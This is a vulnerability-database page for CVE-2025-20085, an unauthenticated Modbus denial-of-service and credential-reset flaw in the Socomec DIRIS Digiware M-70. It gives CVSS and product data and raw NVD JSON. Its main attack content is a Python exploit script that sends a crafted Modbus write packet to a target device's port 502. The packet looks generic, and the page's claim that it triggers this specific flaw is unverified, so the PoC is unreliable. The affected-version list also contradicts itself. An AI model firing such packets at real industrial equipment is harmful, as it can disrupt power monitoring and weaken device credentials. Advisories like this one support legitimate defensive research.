Security Vulnerability Report
CVE-2025-20085 CVSS 7.2 HIGH

CVE-2025-20085

Published: 2025-12-01 16:15:52
Last Modified: 2025-12-05 20:49:00

Description

A denial of service vulnerability exists in the Modbus RTU over TCP functionality of Socomec DIRIS Digiware M-70 1.6.9. A specially crafted network packet can lead to denial of service and weaken credentials resulting in default documented credentials being applied to the device. An attacker can send an unauthenticated packet to trigger this vulnerability.

CVSS Details

CVSS Score: 7.2
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:o:socomec:diris_m-70_firmware:1.6.9:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:socomec:diris_m-70:-:*:*:*:*:*:*:* - NOT VULNERABLE
Socomec DIRIS Digiware M-70 < 1.6.9
Socomec DIRIS Digiware M-70 1.6.9 (known affected)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3
"""
CVE-2025-20085 PoC - Socomec DIRIS Digiware M-70 Modbus RTU DoS
Reference: TALOS-2025-2138
Note: This is for educational and authorized testing purposes only
"""

import socket
import struct
import sys


def create_modbus_rtu_packet():
    """Craft a malicious Modbus RTU over TCP packet"""
    # Modbus Application Protocol Header
    transaction_id = struct.pack('>H', 0x0001)  # Transaction Identifier
    protocol_id = struct.pack('>H', 0x0000)     # Protocol Identifier (Modbus)
    length = struct.pack('>H', 0x0006)          # Length
    unit_id = struct.pack('B', 0xFF)            # Unit Identifier

    # Modbus Function Code (Write Single Register - commonly exploited)
    function_code = struct.pack('B', 0x06)
    reference_number = struct.pack('>H', 0x0000)
    register_value = struct.pack('>H', 0x0000)

    return transaction_id + protocol_id + length + unit_id + function_code + reference_number + register_value


def exploit(target_ip, target_port=502):
    """Send exploit packet to target"""
    print(f"[*] Target: {target_ip}:{target_port}")
    print(f"[*] Crafting malicious Modbus RTU packet...")

    packet = create_modbus_rtu_packet()

    try:
        print(f"[*] Sending exploit packet...")
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.settimeout(10)
        sock.connect((target_ip, target_port))
        sock.send(packet)
        print(f"[+] Packet sent successfully")
        print(f"[+] Target may be affected - check device status")
        sock.close()
    except socket.timeout:
        print(f"[-] Connection timeout - target may be vulnerable and not responding")
    except socket.error as e:
        print(f"[-] Socket error: {e}")
    except Exception as e:
        print(f"[-] Error: {e}")


if __name__ == "__main__":
    if len(sys.argv) < 2:
        print(f"Usage: {sys.argv[0]} <target_ip> [port]")
        sys.exit(1)

    target = sys.argv[1]
    port = int(sys.argv[2]) if len(sys.argv) > 2 else 502
    exploit(target, port)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-20085", "sourceIdentifier": "[email protected]", "published": "2025-12-01T16:15:51.960", "lastModified": "2025-12-05T20:49:00.420", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A denial of service vulnerability exists in the Modbus RTU over TCP functionality of Socomec DIRIS Digiware M-70 1.6.9. A specially crafted network packet can lead to denial of service and weaken credentials resulting in default documented credentials being applied to the device. An attacker can send an unauthenticated packet to trigger this vulnerability."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 2.7}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-306"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:socomec:diris_m-70_firmware:1.6.9:*:*:*:*:*:*:*", "matchCriteriaId": "C07608BE-E7E3-44F5-AE9A-4AE36679F58A"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": 
false, "criteria": "cpe:2.3:h:socomec:diris_m-70:-:*:*:*:*:*:*:*", "matchCriteriaId": "153A9D26-2C76-4B6B-AFD8-22DEB2081F34"}]}]}], "references": [{"url": "https://talosintelligence.com/vulnerability_reports/TALOS-2025-2138", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.socomec.fr/sites/default/files/2025-04/CVE-2025-20085---Diris-Digiware-Webview-_VULNERABILITIES_2025-04-11-17-14-39_English_0.pdf", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.talosintelligence.com/vulnerability_reports/TALOS-2025-2138", "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": ["Vendor Advisory"]}]}}